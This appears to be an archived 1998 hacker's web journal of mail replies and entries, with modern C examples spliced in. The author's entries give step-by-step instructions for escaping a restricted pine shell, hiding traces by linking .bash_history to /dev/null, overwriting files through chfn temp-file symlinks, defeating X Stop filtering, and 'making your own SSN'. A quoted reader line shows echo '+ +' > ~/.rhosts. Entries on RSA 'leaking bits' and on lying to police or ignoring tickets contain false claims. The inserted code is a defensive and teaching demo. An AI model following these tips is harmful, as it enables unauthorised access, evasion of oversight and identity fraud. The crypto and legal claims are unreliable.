   want to ask your system administrator if he knows, in a pinch. I will
   mail you if I find out. You can find out what kind of system you are
   using by typing "uname -a" and then you can check the distribution
   with the manufacturer and ask them if it uses ELF system binaries.
   That's the only thing I can think of off hand. Hasta!

   > thanks very much for that prompt reply. Kool! I've been visiting your
   > page and trying exploits, Kool. I've tried the rlogin and it worked!
   > Thanks very much, I'll keep on visiting your cool page Hasta!

   Well, I talked to my friend, and he came up with some interesting
   ideas (some of which I slightly disagree with). He said there is no
   (good) way to tell if something is an ELF binary by any command;
   however, there are some things to check so you can narrow down your
   search. Do an "ls -al /bin/" and if the things listed in that
   directory are large (meaning several hundred k for something fairly
   simple like "ls") then you are more likely to be sure that it is an
   ELF system. He also said that you can look at login and see; however,
   I disagree, as that is sometimes dynamically and sometimes statically
   compiled, so that is a bad example, and could lead you astray. You
   might also want to do a "strings" command on things found in /bin and
   that might show if it is an ELF system, but again, I disagree and I
   think your best bet is either to talk to the distributor, OR look at
   things found in /bin and see if they are huge files (anything over
   100,000k is huge). I hope that helps. By the way, check out "Site B"
   sometime, I will put these letters on there. ;) Hasta!
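   Rather than guessing from file sizes, you can recognise ELF from its
   header: every ELF file starts with the four bytes 0x7f 'E' 'L' 'F', and
   the two bytes after that say whether it is 32- or 64-bit and which byte
   order it uses. The C program below is an added example (not from the mail
   above or from any project) that checks those bytes for each file named on
   the command line, e.g. the contents of /bin; the a.out magic numbers it
   also recognises are the classic 0407, 0410, 0413 and 0314.

```c
/* Added example: tell an ELF binary from an a.out one by reading the header,
 * not by guessing from file size. Classic a.out magic numbers (0407 OMAGIC,
 * 0410 NMAGIC, 0413 ZMAGIC, 0314 QMAGIC) are compared as they are stored on a
 * little-endian machine: in the low 16 bits of the first word. */
#include <stdio.h>
#include <string.h>

typedef struct {
    int is_elf;        /* 1 if the file starts with 0x7f 'E' 'L' 'F' */
    int elf_class;     /* EI_CLASS: 1 = 32-bit, 2 = 64-bit (0 if unknown) */
    int little_endian; /* EI_DATA: 1 = little-endian, 0 = big-endian/unknown */
    int is_aout;       /* 1 if the first word is a classic a.out magic number */
} bin_info;

/* Classify the first bytes of a binary. Takes a buffer so that it can be run
 * on a file read from /bin or on constructed sample bytes. */
bin_info classify_header(const unsigned char *buf, size_t len)
{
    bin_info info = {0, 0, 0, 0};

    /* The ELF identification starts with a fixed four-byte magic number. */
    if (len >= 4 && memcmp(buf, "\x7f" "ELF", 4) == 0) {
        info.is_elf = 1;
        if (len >= 6) {
            info.elf_class = buf[4];            /* EI_CLASS */
            info.little_endian = (buf[5] == 1); /* EI_DATA, 1 = LSB first */
        }
        return info;
    }

    /* a.out: the magic lives in the first 16-bit word of the exec header. */
    if (len >= 2) {
        unsigned magic = buf[0] | ((unsigned)buf[1] << 8);
        if (magic == 0407 || magic == 0410 || magic == 0413 || magic == 0314)
            info.is_aout = 1;
    }
    return info;
}

/* Read enough of a file for the ELF header (52 bytes for ELF32, 64 for ELF64)
 * and classify it. Returns 0 on success, -1 if the file cannot be opened. */
int classify_file(const char *path, bin_info *out)
{
    unsigned char buf[64];
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    *out = classify_header(buf, n);
    return 0;
}

/* Human-readable summary, e.g. "ELF64 little-endian" or "a.out". */
const char *describe(bin_info b)
{
    if (b.is_elf) {
        if (b.elf_class == 2)
            return b.little_endian ? "ELF64 little-endian" : "ELF64 big-endian";
        if (b.elf_class == 1)
            return b.little_endian ? "ELF32 little-endian" : "ELF32 big-endian";
        return "ELF (unknown class)";
    }
    return b.is_aout ? "a.out" : "not an ELF or a.out executable";
}

/* Usage: ./elfcheck /bin/ls /bin/sh ... */
int main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        bin_info b;
        if (classify_file(argv[i], &b) != 0) {
            perror(argv[i]);
            continue;
        }
        printf("%s: %s\n", argv[i], describe(b));
    }
    return 0;
}
```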
     _________________________________________________________________
   
   --DATE--1-30-98--What to do when caught-- I read a REALLY good article
   in Motorcycle World last August and it stuck with me as being one of
   the single greatest papers I have read to date. Motorcycle World is
   about just that, motorcycles. I don't own one personally currently,
   but I have, and my father does, so I do know quite a bit about the
   sport, and occasionally I read the magazine when I am home visiting.
   Regardless, the paper went into what to do when caught on the street
   by police. For the purposes of this paper, I am not going to cite the
   article, because I am going to broaden the scope of what was said
   considerably. A common misconception is that it is illegal to lie to a
   police officer. This is just plain fallacy. It is ABSOLUTELY legal to
   lie to police officers in all but two cases. The first is if the
   officer asks your identity, and the second is if you are NOT a suspect
   in a crime (as that is considered hindering an ongoing investigation).
   However, on the flip side, officers ARE allowed to lie to you. It is a
   known statistic that 90% of all convictions are made by confession
   alone. A police officer doesn't have to prove a thing if you confess.
   So how does an officer get you to confess? Well, in the example the
   paper used, when a policeman pulls you over off the side of the road,
   he first asks you "How fast do you think you were going?" Most people
   would either say, "I don't know" or tell the police officer EXACTLY
   how fast they were going. This is considered a confession. What SHOULD
   you do? Well, I am not TELLING you to lie, but let's put it this way:
   unless they used official methods of checking your speed (clocking
   your speed over a certain length of road, or radar checks in approved
   radar zones) they cannot convict you of anything. By admitting to the
   fact that you were going however fast you were going you are giving up
   your constitutional rights. Police officers are (this is the god's
   honest truth here) TOLD to lie during police academy, to make dealing
   with criminals and the public as a whole easier. I can remember a few
   times when I was pulled over for various reasons, but once when I was
   speeding, the officer asked me what the speed limit was, and I told
   him 35, and he asked me how fast I was going, and I responded, "I
   believe I was going 35, sir." He told me that I was going quite a bit
   above that (which I probably was, knowing me and that particular
   street) but because he couldn't prove it, and I didn't admit to it, he
   had no reason to write me a ticket. Our very own Central Intelligence
   Agency (CIA) knows this fact all too well as their inside motto is:
   "Admit nothing. Deny everything. Make counter-accusations." The people
   who are least likely to get traffic violations are lawyers and
   ex-cons. Food for thought. The reason being, they know their
   constitutional rights. More on the traffic issues: There is a way of
   getting a ticket without anyone being around, and this is "photo
   radar". They have cameras at street intersections and they take a
   picture of your front licence plate if you disobey common road safety
   laws. What do you do if you receive a ticket like this in the mail?
   Well, according to the ex-police officer in this article you should
   completely ignore it. The ticket does NOT go on your DMV record, and
   is just a way to generate revenue for the state. Photo traffic
   violations do not constitute "service of summons". If you receive a
   ticket like this via registered mail, refuse to sign, thereby forcing
   the people who wrote the ticket to hire someone to process the ticket
   at considerable expense. In most cases these tickets will be dropped
   immediately, because it will cost the state more money to try to get
   the money from you than if they just ignore your particular violation.
   The point of this being, know your rights. Remain silent when
   arrested. Talk to your attorney first. Know that you CAN lie to police
   officers. Know that police officers DO lie to you. Also, be NICE when
   talking to police officers. They have a shitty job to do, and I think
   we can all sympathize with that. They are much friendlier and much
   easier to deal with when you are nice to them. They just want the
   respect that they (in most cases) deserve. Smile! Take care out there
   folks, and stay out of trouble! Hasta!
     _________________________________________________________________
   
   --DATE--1-30-98--Mail--

   > hello rsnake, I got a small question if you have time to answer. I
   > recently got a hotmail account and I noticed they show TONS of
   > information about the sender of mail. Is there a way to see that
   > information on normal email (the one that came with my prodigy). I'm
   > using netscape navigator 3.0 if you need to know that information. Any
   > help would be appreciated, thanks.

   Hrm, are you referring to header information? If so, just save the
   document (go to File, then go down to Save As) into an HTML document
   on your hard drive. Then just view that source with Notepad or
   something similar. That will reveal the headers. If you aren't talking
   about headers, I am not sure what you are referring to. Hope that
   helps. Hasta!

   > Rsnake, the header information is exactly what I was referring to. I
   > know its only superficial information but I couldn't figure out a way to
   > access it. Now that brings up another question, if I save it into an
   > html format, could that activate a virus that was inside? Or can you
   > only get one by downloading an attached file. I hate to bother you so
   > much, but you're one of the few people that gives straight answers. Thanks
   > a lot for your help.

   Hehe... Okay, yes, it is possible to execute a virus if you convert an
   e-mail to HTML AND view it through an HTML editor/browser. However,
   the virus would have to be written in either JavaScript or VBScript
   (if you view the document through MS Internet Explorer). If it is
   written in any other language, it would have to be run. If you save
   the document, it will not save attachments, however, so you are pretty
   safe from that. I wouldn't recommend viewing headers through a browser
   though, because it will misinterpret certain characters as part of
   the HTML. Use Notepad, or WordPad, open it as a .txt file and all will
   be good. Hope that helps. Hasta!
     _________________________________________________________________
   
   --DATE--1-31-98--CHFN Vulnerability (possible)-- Hrm... well, while
   playing around on a local system (that I have access to), I noticed
   something interesting. There is a Linux/Unix command called chfn
   (change finger name) used to change information about a user (such as
   home address, home phone, "real name" etc...). Anyway, while playing
   around with it, I noticed that it opened an editor to change this
   information. I am not sure of the version of chfn that I was using,
   but if yours doesn't open up an editor, you can be sure that this is
   NOT the version you are using. Anyway, it wrote to a tmp file called
   /tmp/chpass.xxxxxx (the x's are some combination of numbers, but
   surprisingly predictable). The tmp file name is based (somewhat) on
   the time. So if you made a symbolic link to /bin/bash or something
   (because chfn is suid root) you could theoretically overwrite bash and
   cause a nasty denial of service attack. This has really nasty
   potential. Of course you would have to write a fairly easy shell
   script (no, I am not going to write it for you people) to link all the
   potential file names to whatever the file is you wish to overwrite.
   Mind you, this is all theoretical, and I haven't tested it, but I
   don't see why it wouldn't work. Okay, goodnight all. Hasta!
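   The weakness described here is a predictable temporary file name combined
   with an open() that follows whatever already sits at that path. The C
   program below is an added example (not the chfn source) that reproduces
   the situation in a private scratch directory and contrasts the unsafe open
   with the hardened forms a setuid program should use: O_EXCL plus
   O_NOFOLLOW, or better, mkstemp(3). The directory, "victim" file and the
   guessable name chpass.123456 are constructed for the demonstration.

```c
/* Added example, not chfn's own code: a guessable temporary file name plus an
 * open() that follows symbolic links lets any local user redirect a privileged
 * program's write onto a file of their choosing. The hardened variants refuse
 * to open anything that already exists at the path. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* O_NOFOLLOW, mkdtemp(3) and mkstemp(3) on glibc */
#endif
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The pattern the post describes: create-or-truncate at a fixed name. If the
 * name is already a symlink, the link is followed and its target truncated. */
int open_tmp_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_EXCL makes the call fail if anything exists at the path (a
 * symlink counts, even a dangling one) and O_NOFOLLOW never follows links.
 * Returns -1 with errno EEXIST or ELOOP when the name has been planted. */
int open_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Reproduce the scenario in a private scratch directory (constructed for the
 * demo; chfn itself writes under /tmp). A "victim" file is created, then a
 * symlink with the guessable name is pointed at it. Returns 1 if the unsafe
 * open truncated the victim while the safe open refused and mkstemp(3) gave a
 * fresh file, 0 if any of those did not happen, -1 on setup failure. */
int demo_symlink_to_tmp(void)
{
    char dir[PATH_MAX] = "/tmp/chpass-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "./chpass-demo-XXXXXX"); /* fall back if /tmp is unusable */
        if (mkdtemp(dir) == NULL)
            return -1;
    }
    char victim[PATH_MAX], guessable[PATH_MAX], tmpl[PATH_MAX];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(guessable, sizeof guessable, "%s/chpass.123456", dir); /* "predictable" */
    snprintf(tmpl, sizeof tmpl, "%s/chpass.XXXXXX", dir);           /* for mkstemp */

    FILE *v = fopen(victim, "w");
    if (v == NULL) { rmdir(dir); return -1; }
    fputs("contents a local user must not be able to destroy\n", v);
    fclose(v);
    if (symlink(victim, guessable) != 0) { unlink(victim); rmdir(dir); return -1; }

    /* 1. The unsafe open follows the link: the victim ends up empty. */
    int followed = 0;
    int fd = open_tmp_unsafe(guessable);
    if (fd >= 0) {
        struct stat st;
        close(fd);
        followed = (stat(victim, &st) == 0 && st.st_size == 0);
    }

    /* 2. The safe open sees that the name is taken and refuses. */
    fd = open_tmp_safe(guessable);
    int refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0) close(fd);

    /* 3. mkstemp(3) picks a random name atomically with O_EXCL, so there is
     *    no fixed name for an attacker to plant a link at. */
    fd = mkstemp(tmpl);
    int fresh = (fd >= 0);
    if (fd >= 0) { close(fd); unlink(tmpl); }

    unlink(guessable);
    unlink(victim);
    rmdir(dir);
    return followed && refused && fresh;
}

int main(void)
{
    int r = demo_symlink_to_tmp();
    printf("unsafe open followed the planted symlink, safe open refused: %s\n",
           r == 1 ? "yes" : r == 0 ? "no" : "setup failed");
    return r == 1 ? 0 : 1;
}
```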
     _________________________________________________________________
   
   --DATE--1-31-98--SSN-- People have asked me about social security
   numbers, etc... Not much to say about them. Except for a few numbers
   issued in the mid 70s all SSNs have 9 digits. Very few have been
   issued above 595. Anyone whose SSN is between 700-729 is most likely
   older, as those were issued by the Railroad Retirement Agency and they
   haven't been assigned since the early 60s. As far as making your own
   SSN, here are some rules of thumb: SSNs never end in four zeros. They
   never start with 73, 79, 6 or 8. Lastly they very rarely start with 9
   as there were very few ever issued. Here is the list of SSN area
   numbers for the US states and territories. Stay out of trouble. Hasta!

   Alabama               416-424
   Alaska                574
   American Samoa        581-585
   Arizona               526-527, 600-601
   Arkansas              429-432
   California            545-573, 602-626
   Colorado              521-524
   Connecticut           040-049
   Delaware              221-222
   District of Columbia  577-579
   Florida               261-267, 589-595
   Georgia               252-260
   Guam                  581-585
   Hawaii                575-576
   Idaho                 518-519
   Illinois              318-361
   Indiana               303-317
   Iowa                  478-485
   Kansas                509-515
   Kentucky              400-407
   Louisiana             433-439
   Maine                 004-007
   Maryland              212-220
   Massachusetts         010-034
   Michigan              362-386
   Minnesota             468-477
   Mississippi           425-428, 587-588
   Missouri              486-500
   Montana               516-517
   Nebraska              505-508
   Nevada                530
   New Hampshire         001-003
   New Jersey            135-158
   New Mexico            525, 585
   New York              050-134
   North Carolina        237-246
   North Dakota          501-502
   Ohio                  268-302
   Oklahoma              440-448
   Oregon                540-544
   Pennsylvania          159-211
   Philippine Islands    581-585
   Puerto Rico           581-585
   Rhode Island          035-039
   South Carolina        247-251
   South Dakota          503-504
   Tennessee             408-415
   Texas                 449-467
   Utah                  528-529
   Vermont               008-009
   Virgin Islands        580
   Virginia              223-231
   Washington            531-539
   West Virginia         232-236
   Wisconsin             387-399
   Wyoming               520
     _________________________________________________________________
   
   --DATE--2-9-98--Breaking out of the pine shell-- Thought I might put a
   brief entry on here about breaking out of the pine shell. What do I
   mean by that? Well, there are certain systems (I have personally
   encountered 4 exactly like this) that restrict telnet access (or try
   to) by making the shell you use pine (an e-mail editor) versus bash or
   ksh. (This would be the equivalent of being restricted to Eudora in
   Windows 95). You can see why this is annoying. Well, here is one way
   to break out of the shell. First of all, when pine opens up it goes to
   a screen that gives you certain commands. One of which is a setup
   command. You want to select that and then select config. Near the
   bottom are two lines (space bar down until you can't go any farther).
   Somewhere near the bottom will be lines saying "speller" and "image
   viewer". We will just use the first one for the time being. If it says
   "Fixed Value 'spell'" or something like that then you are basically
   screwed using this method. If it doesn't say that then you press
   enter, and type the words "/bin/bash" into the input box. Then exit
   out of there, and save your new configuration. Then compose a message
   and press control-T. You should get a # sign or something similar.
   Voila! You now have free rein over your own shell account. If you had
   chosen to do this with "image viewer" you would have to send yourself
   a picture file and then try to view it with the "V" command. Another
   nice little trick to remember is if you have access to a shell
   account, more than likely it also has FTP installed. There is nothing
   stopping you from uploading files (like a .profile or .login file)
   that will open /bin/bash before you ever have a chance to load pine
   up. All useful tricks in a pinch. Very sloppy though, and you WILL
   leave traces (.bash_history) so be careful and make sure to link your
   .bash_history to the null device to cover your tracks (or go back
   through FTP and delete your .bash_history and .profile if you put a
   new one there). You can link your .bash_history to the null device
   with this command: "ln -s /dev/null .bash_history". Stay out of trouble
   now! Hasta!
     _________________________________________________________________
   
   --DATE--3-17-98--PGP BREAKABLE???-- Okay, I was talking to a local PGP
   freak today for quite some time, and he told me some things of
   interest involving PGP. First of all this is mostly theory, and very
   little practice, but this could lead the way toward some massive
   attacks against the RSA algorithm. Let's say you have plaintext (P)
   and public key (Kp). When you encrypt P with Kp you get ciphertext
   (C). Pretty simple, right? Okay, here is where it gets a little
   nasty. It turns out that if you encrypt C with Kp multiple times,
   eventually it will lead back to P with O iterations. There is ALSO
   another way to break C back to P: there are other variations of bits
   that are close enough that they will break the ciphertext, called o. o
   occurs much more often than the guaranteed O and works almost as well.
   o and O depend greatly on the prime numbers used during encryption.
   (Essentially, when asked if you want quick prime-number generation,
   always say no). Strong prime numbers are prime numbers that, when a
   computation is made (something like (x/2)+1) on the prime number,
   create another prime number. Strong-strong prime numbers are where you
   can do the operation twice and achieve another prime number. Okay, so
   that is our main attack now, breaking it through brute force. Dealing
   with mod256 this is doable, but when you get to military grade
   encryption, 1024 or 2048 bits, you are dealing with a whole new
   problem. Yes, it is exhaustively possible, but it would take more
   seconds to do than there have been in the universe's history. Okay, so
   here is where our second attack comes into play. It turns out
   (mathematically) that portions (fractions) of bits are leaked each
   time you encrypt something. So if your target sends you 10,000
   messages you might shave off 500 bits (a HUGE reduction in security =
   2^1024 - 2^500). That logarithmically halves the security on industry
   grade RSA. The end result is that through a combination of brute force
   attacks on C with Kp and on leaked bits, the RSA algorithm becomes
   breakable. Scary, huh? Hasta!
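   The "keep encrypting C with Kp until P comes back" idea is the cycling
   attack on RSA. The C program below is an added example, not from the post
   or from PGP, that carries it out on a toy key constructed for the
   demonstration (p = 61, q = 53, so n = 3233, with e = 17 and plaintext 65);
   the iteration count it returns is the post's O, and for a properly
   generated 1024-bit key that count is astronomically large, which is why
   the attack stays theoretical.

```c
/* Added example: the RSA cycling attack on a toy key. Encryption with the
 * public key is a permutation of the residues mod n, so repeatedly encrypting
 * a ciphertext must eventually return to it, and the value seen one step
 * before that is the plaintext. Moduli must stay below 2^32 so that the
 * products below fit in 64 bits. */
#include <stdint.h>
#include <stdio.h>

/* Square-and-multiply modular exponentiation: base^exp mod n. */
uint64_t modpow(uint64_t base, uint64_t exp, uint64_t n)
{
    uint64_t result = 1;
    base %= n;
    while (exp > 0) {
        if (exp & 1)
            result = (result * base) % n;
        base = (base * base) % n;
        exp >>= 1;
    }
    return result;
}

/* C = P^e mod n, the public-key operation the post calls "encrypt P with Kp". */
uint64_t rsa_encrypt(uint64_t p, uint64_t e, uint64_t n)
{
    return modpow(p, e, n);
}

/* Cycling attack. Starting from c, keep applying the public key until the
 * sequence comes back to c. Stores the recovered plaintext in *p_out and
 * returns the number of encryptions needed (the post's "O"), or 0 if 'limit'
 * encryptions were done without closing the cycle. */
uint64_t cycling_attack(uint64_t c, uint64_t e, uint64_t n, uint64_t limit,
                        uint64_t *p_out)
{
    uint64_t prev = c;
    uint64_t cur = modpow(c, e, n);
    uint64_t steps = 1;
    while (cur != c) {
        if (steps >= limit)
            return 0;
        prev = cur;
        cur = modpow(cur, e, n);
        steps++;
    }
    /* cur == c and cur == prev^e, so prev^e == P^e mod n; the map x -> x^e
     * is injective on the residues, hence prev == P. */
    *p_out = prev;
    return steps;
}

/* Wrappers so each result can be checked on its own (0 signals failure,
 * which is fine for this demo since the plaintext is never 0). */
uint64_t recovered_plaintext(uint64_t c, uint64_t e, uint64_t n, uint64_t limit)
{
    uint64_t p = 0;
    return cycling_attack(c, e, n, limit, &p) ? p : 0;
}

uint64_t cycle_length(uint64_t c, uint64_t e, uint64_t n, uint64_t limit)
{
    uint64_t p = 0;
    return cycling_attack(c, e, n, limit, &p);
}

int main(void)
{
    /* Toy key constructed for the demo: p = 61, q = 53, n = 3233, e = 17.
     * The matching private exponent is d = 413. */
    const uint64_t n = 3233, e = 17, plaintext = 65;
    uint64_t c = rsa_encrypt(plaintext, e, n);
    uint64_t p = 0;
    uint64_t k = cycling_attack(c, e, n, 1000000, &p);
    printf("C = %llu, recovered P = %llu after %llu encryptions\n",
           (unsigned long long)c, (unsigned long long)p, (unsigned long long)k);
    /* For ROT13 (see the next entry) the same idea closes after 2 applications.
     * For a properly generated 1024-bit RSA key the count k is astronomically
     * large, which is why cycling does not threaten RSA in practice. */
    return 0;
}
```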
     _________________________________________________________________
   
   --DATE--3-18-98--PGP BREAKABLE?? II-- This is more on the above topic.
   This is my reply to his reply. I hope you understand. ;) Hasta!

      | This sounds exactly like the attack you can accomplish with ROT13, if you
      | don't want to take the task to pen&paper, just use ROT13 three times and
      | you get the original message. No fuss...no muss......

      Wait, that IS the whole point of ROT13! But it should only be ONE
      iteration to get back from C to P. I.e.:

      [8 leprosy/user/s2/rsnake/bin] cat rot13.c
      #include <stdio.h>
      int main()
      {
          int c;
          while((c=getchar())!=EOF){
              if(c>='a'&&c<='m')c=c+13;
              else if(c>='n'&&c<='z')c=c-13;
              else if(c>='A'&&c<='M')c=c+13;
              else if(c>='N'&&c<='Z')c=c-13;
              putchar(c);
          }
          return 0;
      }
      [9 leprosy/user/s2/rsnake/bin] gcc rot13.c -o rot13
      [10 leprosy/user/s2/rsnake/bin] rot13
      Hello, this is a test.
      Uryyb, guvf vf n grfg.
      ^C
      [11 leprosy/user/s2/rsnake/bin] rot13
      Uryyb, guvf vf n grfg.
      Hello, this is a test.
      ^C
      [12 leprosy/user/s2/rsnake/bin]

      | This is only *possible* if you have a few hundred years on your hands & a cray
      | super'puter.

      With mod256? I think it is a little more doable than a couple hundred
      years. I don't know the exact numbers, but it should be possible
      within a few months (assuming you find an o that works and not the
      true O). Remember, we aren't trying to completely crack C, we are
      only trying to get a close approximation. If you get close enough,
      you will be able to understand the P, although possibly missing one
      character, or the structure of the text (but in the end the gist of
      the message has been revealed). Not 100% reliable, but most certainly
      broken.

      | Not really....seeing how the majority of the messages that people use
      | encryption to keep private are *time-sensitive*......thus, if someone were
      | to obtain a piece of encrypted mail from me intended for you RSnake...by
      | the time they have run their bruteforces & multiple encrypt sessions on
      | it....the information will be of VERY LITTLE VALUE! Think about
      | it.......unless you have set-up a NTFS to encrypt data on every write &
      | decrypt data on every read on your HD....then the messages that you send to
      | someone using strong crypto (*in todays convention anywayz*) usually
      | contains info that is imperative upon a SPEEDY reply/action. If
      | not....then I would take every precaution to encrypt the message ATLEAST
      | 4-6 times....then hide the message using steganography inside a B&W
      | *.bmp....this way..the message blends easier with the normal data noise
      | from the bmp. Just my opinion though.......always open for
      | discussion.....usually ending in my opinion changing! ;)

      First of all, your method is the ONLY way, I believe, to truly hide
      information. Steganography is an art which few people understand.
      Steganography, I believe, will have more of a following, once people
      realize it is just a matter of time before modern computers and math
      can decrypt anything thrown at them. After talking to Kwan (the man
      who wrote SNOW and the ICE crypt function) I now believe that
      steganography is a better failsafe than any level of crypt. If they
      don't know something is crypted, they won't bother to crack it.
      Simple logic. Remove the element of curiosity. I was briefly talking
      to a "spy" for the Air Force, whose job it was to accept incoming
      captured PGP messages via radio, and log them, and do some sort of
      decryption on the messages he got. Not to decrypt them completely
      but to try to evaluate the RSA algorithm used, to make it
      potentially weaker for future conversations. With this sort of loss
      in security (hundreds of bits) you could potentially decrypt
      incoming messages in a matter of hours. If this "spy" was doing what
      I think he was doing, he is merely logging information, so that
      later, finding out the P would be relatively easy. Starting now
      could potentially make breaking PGP in 5 years as trivial as
      breaking crypt login(1) is now. Of course there will always be a
      better version of PGP, but for those people who don't bother to use
      strong strong primes and for those who don't bother to make their
      messages time sensitive, their days are numbered. ;)
     _________________________________________________________________
   
   --DATE--4-1-98--X STOP-- Here is a letter I received about a blocking
   program called X Stop.

      | Hey there, My friend is having a "problem" with his computer. His parents
      | put "X Stop" on his computer. It's one of those block or filter "bad"
      | internet site things. I told him to mail, but ironically enough, yours is
      | blocked! :) Anyways, I've been trying to help him, but the 2 files
      | (C:\windows\system\xblock95.dll and c:\windows\system\xstop95.exe) are
      | file protected so they can't be corrupted and what not. If you know any way
      | to stop this program short of formatting could you please tell me? I only
      | ask you because I saw that earlier article on how to stop Full Armor or
      | something like that. Sorry for the long letter :)
      | Cya!

      C:\>attrib /?
      Displays or changes file attributes.

      ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H] [[drive:][path]filename] [/S]

        +   Sets an attribute.
        -   Clears an attribute.
        R   Read-only file attribute.
        A   Archive file attribute.
        S   System file attribute.
        H   Hidden file attribute.
        /S  Processes files in all directories in the specified path.

      Hello. First let me say that I laughed out loud with that
      "ironically enough" story. ;) Okay, onto the question. I have never
      encountered this problem, but from your description it should be
      fairly easy. Go into MS-DOS and use the attrib command (the help
      text above shows the syntax). First do an attrib on those two
      files. It will have an R or an A preceding the files. To make the
      files writable or un-archive them simply type:

      attrib -R xblock95.dll
      attrib -R xstop95.exe

      or

      attrib -A xblock95.dll
      attrib -A xstop95.exe

      That should make the files manipulable so you can either corrupt
      them, or move them. I hope that helps. Hasta!
     _________________________________________________________________
   
   --DATE--4-21-98--Mindless Babbling--

   | On your little page about hacking you said:
   |
   | Something that has come about recently in the news is the new ping
   | bug. Ok, let me dispel some things about this weakness. First of all
   | it is VERY traceable
   |
   | But isn't the ip address tagged onto ICMP packets application layer
   | specific and therefore spoofable?...and since you don't ever really NEED
   | to receive a reply from an ICMP packet...you can make it look like it
   | came from anywhere you like? And keeping this in mind, isn't it possible
   | then to spoof ICMP packets with a request for echo reply and thus take
   | down two machines with one fell swoop?

   Well... you can spoof the packets, yes, but you cannot take down two
   machines at once. Once a machine that is vulnerable is attacked with
   the ICMP packet it cannot echo reply (because it is down). Therefore
   you could not receive an echo from it. Also, this is NOT untraceable
   if the machine you are attacking is running a current version of Bind
   or is watching netstat. It would be less traceable surely; however,
   far from perfect.

   | and...
   |
   | >Uhm, Carnie? Just to clarify, that "virus" is just a chain mail.
   | >It is totally impossible to send a virus over e-mail, it is totally
   | >impossible to activate it by reading it (as e-mail is not an
   | >executable file, it is just text
   |
   | But is it not possible for a malicious author of an email client or
   | filter program to have a portion of code triggered by a particular
   | string of text?

   Of course it is. We have to rely on the validity of the code we are
   currently using. The same is true with the operating system you are
   using: you trust it is valid and backdoors aren't built into it for
   the most part. I wouldn't put it past Microsoft or any small software
   firms, but for the most part I think that is a fairly paranoid
   perspective (that backdoors are intentionally installed). If you are
   really worried about it, code your own e-mail client and give out the
   source so people know you aren't making a backdoor yourself. ;)

   | and...about flash.c
   |
   | If the victim is running vt100 and has mesg y, you can mess him up pretty
   | bad with this. I have seen it not work, in some instances, but usually
   | it does
   |
   | It is possible using escape sequences to request an echo from a Wyse50
   | Terminal...so you can send a command like echo "+ +" > ~/.rhosts and
   | request an echo from the terminal...which will make the user run the
   | command...but you prolly already knew that.

   Right, but that type of system is pretty outdated. The term attack is
   not really an exploit, it is more of a trick, or a DoS if you do it
   right. What you are talking about is using the Wyse system to execute
   arbitrary commands. Your attack is completely different from the
   flash.c attack. I have never tried that attack, because I have never
   had access to a Wyse system. I will say that there are similar attacks
   that can be run from inside networks. Spoofing from the inside of a
   network, you can get machines to essentially give you information
   about the NFS, and if the machines don't force you to authenticate it
   is trivial to get access to the primary name server. Active spoofing
   is often times more productive than passive sniffing on subnets.
   Anyway, that's enough babbling for today. Hasta!
     _________________________________________________________________
   
   --END--
     _________________________________________________________________
   
   This page was created using vi (for UNIX 10.20) and Lemmy (ver 2.0b
   for Windows '95). It was created to work with Lynx, and all graphical
   and nongraphical browsers alike. If you don't like the formatting,
   tell me a better way to do it and I will be more than happy to let you
   write about 200k worth of hacking text over for me.
     _________________________________________________________________
   
     No death threats or poetry please. Just kidding, no poetry please.
